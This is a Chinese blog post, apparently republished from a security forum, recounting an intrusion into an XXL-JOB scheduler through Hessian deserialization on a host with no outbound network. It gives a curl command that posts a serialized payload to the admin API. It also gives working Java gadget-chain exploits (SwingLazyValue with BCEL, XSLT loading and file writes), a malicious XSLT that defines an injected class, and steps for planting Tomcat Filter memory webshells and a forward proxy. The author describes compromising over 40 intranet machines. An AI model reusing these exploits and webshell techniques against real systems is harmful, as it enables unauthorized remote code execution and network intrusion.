Hessian 反序列化及XXL-JOB

最新推荐文章于 2024-05-06 17:36:00 发布
最新推荐文章于 2024-05-06 17:36:00 发布
阅读量388 收藏 2
点赞数
文章标签: 安全 网络安全
原文链接:https://forum.butian.net/share/2592
版权

目录

前言

一、启

二、承

三、转

四、再转

1、Jackson

2、BCEL

3、XSLT

五、合

六、不出网渗透

七、结

前言

我们经常在CTF里见到Java反序列化的题,而如何从CTF过渡到实战中是一个坎儿,今天就说一次在实战中遇到的不出网Hessian反序列化问题。

文章所有内容无敏感信息,均为本地环境,只做思路分享。

一、启

image.png


最初就是实战中发现一个XXL-JOB任务调度器,尝试了几番爆破无果后本来打算放弃了的,但是想到之前XXL-JOB爆出过一个Hessian反序列化的漏洞,就试探性的访问了一下/api接口,结果不出所料

image.png


(图中很多很奇怪的Filter名称不需要在意,这是我打的内存马的名字,我们一步步道来)

二、承

看到这一步我就豁然开朗,试探性的用了网上所说的Gadget去打了一波JNDI注入的链子,过程如下
起一个恶意的JNDI服务先,然后用marshallsec去构造gadgets

image.png


然后发送payload

curl -XPOST -H "Content-Type: x-application/hessian" --data-binary @test.ser http://xxx:8080/xxl-job-admin/api

image.png


 

image.png


这里不用vps发包是因为我vps被ban了- -
可以看到是触发了lookup的,但是不出网,那怎么办呢?办法就只有一个了,那就是手打内存马

三、转

那我们就需要对源码进行分析,首先先去官网把漏洞版本的xxl-job下载下来看一下。

image.png

整体是基于springboot服务的,所以打内存马的话,我们只需要挑选一个Tomcat的Filter内存马即可,这里有2个问题

  • 第一个就是为什么不打springboot内存马

这是因为Springboot的interceptor本质上就是Filter,但是从优先级来看Filter是更高的,而在xxl-job实际上是有几个默认的interceptor的,所以优先级不够。

image.png

  • 为什么只能是Filter内存马

鉴于上面说的默认interceptor,xxl-job内置有登录鉴权的interceptor,所以注入controller型的内存马,会因为优先级的问题而失效
那么我们最终就选择使用JMG工具生成一个冰蝎的Tomcat Filter内存马,JMG这款工具生成的内存马兼容性很强,比较推荐使用
GitHub - pen4uin/java-memshell-generator-release: 一款支持高度自定义的 Java 内存马生成工具

image.png


这样我们就得到了内存马的base64字节码了。我们怎么进行测试呢,github有maven项目源码,我们在help路由处对这个字节码进行加载。

image.png


咱们访问一下help路由
 

image.png


访问两次出现这个就是注入成功了,因为打2次第二次会显示已存在,我们冰蝎连接试一下。

image.png

image.png


显然我们是注入成功了。

四、再转

那么我们的问题就来到了Gadgets上面,假如对nacos的raft反序列化熟悉的小伙伴应该不会缺链子,这里一开始是有很多种思路的

  • JackSon反序列化
  • BCEL字节码加载
  • XSLT文件加载

1、Jackson

首先说到jackson,在AliyunCTF上爆出来的gadgets让绝大多数springframework都受到影响,因为他们都有Jackson依赖,可以打getter。但是在这个环境下版本过高,jackson无法利用

image.png


版本达到了2.8,在这个版本,BaseJsonNode可以触发getter的toString方法被移除了

image.png


因此无法继续利用

2、BCEL

在TCTF2022中出现了一个叫做Hessian-Onlyjdk的题,这个题的影响程度很高,不仅仅是在CTF更是在Realworld,他提供了一种JDK8原生的hessian gadgets,利用SwingLazyValue可以触发任意类的静态方法。
EXP

public class HessianSwingLVBCEL {
    public static void main(String[] args) throws Exception {
        //Pkcs9可以换成MimeTypeParameterList
        PKCS9Attributes pkcs9Attributes = SerializeUtils.createWithoutConstructor(PKCS9Attributes.class);
        UIDefaults uiDefaults = new UIDefaults();
        String bcelStr = SerializeUtils.makeBcelStr(BcelRCE.class);
        uiDefaults.put(PKCS9Attribute.EMAIL_ADDRESS_OID, new SwingLazyValue("com.sun.org.apache.bcel.internal.util.JavaWrapper", "_main", new Object[]{new String[]{bcelStr,"s"}}));
        SerializeUtils.setFieldValue(pkcs9Attributes,"attributes",uiDefaults);
        SerializeUtils.HessianDeserial(SerializeUtils.HessianTostringSerial(pkcs9Attributes));
        FileOutputStream fileOut = new FileOutputStream("poc.ser");
        Hessian2Output out = new Hessian2Output(fileOut);
        fileOut.write(67);
        out.getSerializerFactory().setAllowNonSerializable(true);
        out.writeObject(pkcs9Attributes);
        out.close();
        fileOut.close();
    }
}


package com.javasec.pocs.rce;

import java.io.IOException;

public class BcelRCE {
    public static void _main(String[] argv) throws Exception {
        Runtime.getRuntime().exec("cmd");
    }
    public static void main(String[] args) {

    }
}

这里用到了com.sun.org.apache.bcel.internal.util.JavaWrapper这个类的_main静态方法,在方法内部可以加载BCEL字节码,会加载恶意类的_main方法。但是问题是,BCEL打内存马需要全反射的形式调用,Bcel类加载器不会加载springframework下的依赖,会抛出ClassNotDefinded的异常,它只能加载jdk包下的原生类,这一点就是一个限制,所以这里假如目标出网可以用这条gadgets,比较方便。

3、XSLT

在nacos的raft反序列化里出现过这条链子

public static void main(String[] args) throws Exception {
        //Pkcs9可以换成MimeTypeParameterList
        PKCS9Attributes pkcs9Attributes = SerializeUtils.createWithoutConstructor(PKCS9Attributes.class);
        UIDefaults uiDefaults = new UIDefaults();
        uiDefaults.put(PKCS9Attribute.EMAIL_ADDRESS_OID, new SwingLazyValue("com.sun.org.apache.xalan.internal.xslt.Process", "_main", new Object[]{new String[]{"-XT", "-XSL", "E:\\payload.xslt"}}));
        SerializeUtils.setFieldValue(pkcs9Attributes,"attributes",uiDefaults);
        FileOutputStream fileOut = new FileOutputStream("poc.ser");
        Hessian2Output out = new Hessian2Output(fileOut);
        fileOut.write(67);
        out.getSerializerFactory().setAllowNonSerializable(true);
        out.writeObject(pkcs9Attributes);
        out.close();
        fileOut.close();

    }
}

该gadgets可在jdk8通杀,这是一条高可用的payload,用到了com.sun.org.apache.xalan.internal.xslt.Process的_main方法去加载恶意的xslt文件,我们可以在xslt文件内部执行任意语句,并且不受限。

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:b64="http://xml.apache.org/xalan/java/sun.misc.BASE64Decoder"
                xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
                xmlns:th="http://xml.apache.org/xalan/java/java.lang.Thread"
                xmlns:ru="http://xml.apache.org/xalan/java/org.springframework.cglib.core.ReflectUtils"
>
    <xsl:template match="/">
        <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'base64')"/>
        <xsl:variable name="cl" select="th:getContextClassLoader(th:currentThread())"/>
        <xsl:variable name="rce" select="ru:defineClass('classname',$bs,$cl)"/>
        <xsl:value-of select="$rce"/>
    </xsl:template>
</xsl:stylesheet>

文件内容如上,加载恶意类,也就是内存马。那么为了加载xslt,我们还需要有一个payload去写入恶意的xslt,用到的gadgets还是一样的。

package com.javasec.pocs.hessian;
import com.caucho.hessian.io.Hessian2Output;
import com.javasec.utils.SerializeUtils;
import sun.security.pkcs.PKCS9Attribute;
import sun.security.pkcs.PKCS9Attributes;
import sun.swing.SwingLazyValue;

import javax.swing.*;
import java.io.FileOutputStream;

public class HessianProxyLVFileWrite {
    public static void main(String[] args) throws Exception {
        //Pkcs9可以换成MimeTypeParameterList
        PKCS9Attributes pkcs9Attributes = SerializeUtils.createWithoutConstructor(PKCS9Attributes.class);
        UIDefaults uiDefaults = new UIDefaults();
        //PKCS9Attribute.EMAIL_ADDRESS_OID 是固定的,调试流程可以看到逻辑
        //去修改需要读取的文件,和写入的文件名,实例中是读取1.txt写入pwned.txt
        uiDefaults.put(PKCS9Attribute.EMAIL_ADDRESS_OID, new SwingLazyValue("com.sun.org.apache.xml.internal.security.utils.JavaUtils", "writeBytesToFilename", new Object[]{"/tmp/1.xslt",SerializeUtils.getFileBytes("E:\\payload.xslt")}));
        SerializeUtils.setFieldValue(pkcs9Attributes,"attributes",uiDefaults);
        FileOutputStream fileOut = new FileOutputStream("poc.ser");
        Hessian2Output out = new Hessian2Output(fileOut);
        fileOut.write(67);
        out.getSerializerFactory().setAllowNonSerializable(true);
        out.writeObject(pkcs9Attributes);
        out.close();
        fileOut.close();
    }
}

这里选用JavaUtils的writeBytesTofilename即可。

五、合

确认了Gadgets和内存马后,我们就可以直接打两次poc了。
这里就以本机为例子,看看curl指令的结果。

image.png


第一发是写入payload

image.png

image.png


成功写入,第二发就是去加载xslt文件

image.png


之后就可以像上面一样去连接冰蝎或者哥斯拉了。

六、不出网渗透

这里目标经过测试是做了nginx的反向代理和负载均匀的,只能访问指定的目的ip
因为涉及敏感信息,这里就不放出截图了,大概的nginx配置如下

upstream xxl-job{
  server xxx.xxxx.xxx.xxx2:xxx
  server xxx.xxx.xxx.xxx1:xxx
}

在这里ICMP和DNS和TCP均不出网,这种情况下是无法上线c2的,因此我们可以选择正向代理进入,这里可以选择Suo5内存马

image.png


注入过后测试连接

image.png


可以看到连接是成功了的,但是半双工模式,这里就是因为nginx做了负载均衡,我们的请求会分发到2个内网机子,导致我们的正向代理发送不了完整的请求,也就有了图片中的连接关闭。这里我们是选择不做代理,直接使用冰蝎的虚拟终端获取完整tty继续渗透。

七、结

最终是拿下了40多台内网机子,算得上是一次比较曲折的不出网内网渗透了,希望上述提到的gadgets以及内存马可以给师傅们一些思路QWQ
如果觉得还不错的话可以点个赞QAQ

原文链接:https://forum.butian.net/share/2592

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

 

渗透测试老鸟-九青
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Nacos JRaft Hessian 反序列化 RCE 分析.pdf
04-22
Nacos JRaft Hessian 反序列化 RCE 分析.pdf
Hessian 序列化、反序列化
字节跳动技术团队官方博客
08-05 4695
动手点关注干货不迷路????背景问题和思考:序列化参数有枚举属性,序列化端增加一个枚举,能否正常反序列化?序列化子类,它和父类有同名参数,反序列化时,同名参数能否能正常赋值?序列化对象增加参数,反序列化类不增加参数,能否正常反序列化?用于序列化传输的属性,用包装器比较好,还是基本类型比较好?为什么要使用序列化和反序列化程序在运行过程中,产生的数据,不能一直保存在内存中,需要暂...
xxl-job反序列化漏洞记录
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
04-09 370
某次“春耕”期间,某业务系统发现xxl-job反序列化漏洞,通过该漏洞不仅爆破了页面账号密码,还获取了内网主机及数据库权限,“家”被偷了。XXL-JOB是一个轻量级分布式任务调度平台。支持通过web页面对任务进行操作,基于Java-spring boot框架开发,利用Maven依赖编译好,开箱即用。XXL-JOB任务调度中心后台存在命令执行漏洞,经过身份验证的(比如存在弱密码)攻击者可通过该漏洞接管服务器,造成严重信息泄露。
hessian学习基础篇——序列化和反序列化
05-26
NULL 博文链接:https://qinghua0208.iteye.com/blog/493516
Hessian 序列化,反序列
u014646588的博客
07-11 555
把Java对象转换为字节序列的过程称为对象的序列化。 把字节序列恢复为Java对象的过程称为对象的反序列化。对象的序列化主要有两种用途: 1)数据介质的存储 2)数据网络传输Hessian 实现运程通信的 Library Hessian 是由 caucho 提供的一个基于 binary-RPC 实现的远程通讯 library 。1 、是基于什么协议实现的? 基于 Binary-RPC 协议
xxl-job反序列化漏洞分析复现
panda的博客
10-20 3622
xxl-job反序列化分析复现
Javaweb安全——Hessian 反序列化
weixin_43610673的博客
02-03 1630
Hessian类似于RMI也是一种RPC(Remote Produce Call)的实现。基于HTTP协议,使用二进制消息进行客户端和服务器端交互。Hessian 自行定义了一套自己的储存和还原数据的机制。对 8 种基础数据类型、3 种递归类型、ref 引用以及 Hessian 2.0 中的内部引用映射进行了相关定义。这样的设计使得 Hassian 可以进行跨语言跨平台的调用。
xxl-job入门
罗小爬的技术宝书
11-14 1013
目录总体架构启动调度中心客户端集成执行器maven依赖集成Xxl-job配置配置执行器组件BEAN模式BEAN模式(类形式)- 实现IJobHandler[推荐]BEAN模式(方法形式)- 为Job方法添加注解@XxlJob新建BEAN模式任务GLUE模式 参考: https://www.xuxueli.com/xxl-job 总体架构 调度模块(调度中心): 负责管理调度信息,按照调度配置发出调度请求,自身不承担业务代码。调度系统与任务解耦,提高了系统可用性和稳定性,同时调度系统性能不再受限于任务模块;
hessian序列化
hzllblzjily的专栏
02-11 1299
1、概念介绍    把Java对象转换为字节序列的过程称为对象的序列化。    把字节序列恢复为Java对象的过程称为对象的反序列化。    对象的序列化主要有两种用途:   1) 数据介质存储   2) 数据网络传输 2、对象序列化实例      为了更好的理解hessian的序列化机制,所以把java和hessian的对象序列化实例都一一列出。      
S25-hessian反序列化1
08-03
介绍自己不会查吗?这里有一个点就是Hessian的序列化与反序列化与原生序列化与反序列化不同,就以使用的Resin链而言,其中的javax.naming.spi
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
-a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode...
Hessian 2.0序列化协议规范.docx
09-14
Hessian 2.0序列化协议规范
安全配置核查关注点
m0_62207482的博客
05-06 246
防火墙对UDP/TCP协议对外提供服务,供外部主机进行访问,如作为NTP服务器、TELNET服务器、TFTP服务器、FTP服务器、SSH服务器等,应配置防火墙,只允许特定主机访问。- 对于VPN用户,必须按照其访问权限不同而进行分组,并在访问控制规则中对该组的访问权限进行严格限制,检查口令生存周期要求。- 配置访问控制规则,拒绝对防火墙保护的系统中常见漏洞所对应端口或者服务的访问。- 查看每个共享文件夹的共享权限,只允许授权的账户拥有权限共享此文件夹。- 检查是否配置NFS服务限制检查。
合规基线:让安全大检查更顺利
a38417的博客
04-29 1110
德迅基线产品还支持自定义基线功能,企业可根据实际的使用场景,自行定义基线的检查项,如定义检查阈值、自定义检查目录、自定义检查结果展现模板、自定义检查项整改方案等,以满足企业多样化的内部监管要求。但是在有限的安全人员、参差不齐的安全技术水平面前,迫切需要能够辅助安全检查与自评估的自动化、标准化的基线检查工具,并且能够支持多种类型的主机、数据库、应用系统等安全基线信息的采集与检测工作。,进行实时安全核查,快速发现安全配置变化,一旦发生安全配置变更异常,以邮件方式进行安全告警。相对于其他同等产品优势,
专家解读 | NIST网络安全框架(1):框架概览
Enlink_Young的博客
05-06 553
当然,在实施CSF过程中,组织对层级的选择和设定也会影响框架配置文件。CSF框架核心由一组适合于各领域关键基础设施部门的网络安全活动、期望结果和参考信息构成,以一种通用的语言描述了适用的网络安全行业标准、指南和实践,以便使从管理层到实施/运营层的利益相关者,能够就网络安全活动和效能进行便捷有效的沟通和交流。CSF是结果驱动型的框架,并且不强制要求组织必须如何实现这些功能,具有不同预算的小型组织或大公司都能够以适合自己的方式实现CSF定义的安全成效,为实施网络安全计划的组织提供了充分的灵活性和扩展性。
深入探讨SOCKS5代理:安全、隐私与技术实现
最新发布
jxyS5的博客
05-06 216
SOCKS5代理是一种网络协议,它在网络客户端和服务器之间建立一个中介,从而允许用户通过第三方服务器来发送数据包。这种代理支持TCP和UDP协议,使其不仅能处理常见的网页数据,还能处理各种程序的数据传输,如FTP、SMTP等。与早期的SOCKS协议版本相比,SOCKS5增加了对认证和IPv6的支持,这使得它在网络通讯中提供了更高的安全性和更好的兼容性。此外,SOCKS5代理不会对传输的数据进行修改,这意味着它能提供一个相对透明的方式来绕过内容限制和审查。
网络安全实训Day16
Yisitelz的博客
04-26 2076
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
WAAP动态安全解决方案
m0_66268916的博客
05-03 729
在此情况下,德迅云安全WAAP应运而生。7、协同防护:通过全站防护管理平台,对网络L3-L7层各防护模块的安全策略进行统一管理,并通过数据聚合、情报协同,形成真正的纵深防护,简化运营工作的同时进一步提升整体安全的防护水位。5、互联网暴露面资产发现:通过平台和人工服务的方式,对域名、IP及关键字的综合查询及关联分析,提供互联网资产的发现、识 别、监测、稽核等服务,帮助用户发现和梳理互联网资产;二、全站防护,在事中阶段,从网络安全、应用安全、业务安全、API安全各层面,为Web应用提供全面安全防护闭环。
xxl-job的问题
08-04
回答: 根据引用[1]的内容,xxl-job在执行过程中可能会出现读写权限的问题。解决方案是通过修改文件权限来解决。另外,引用[3]提到了一些可能导致xxl-job问题的原因,如句柄数过多导致任务调度失败、任务重复执行等。解决这些问题的方法包括修改源码修复、使用行锁避免重复调度等。引用[2]提供了一个解决方案代码,用于解决xxl-jobhessian版本冲突的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值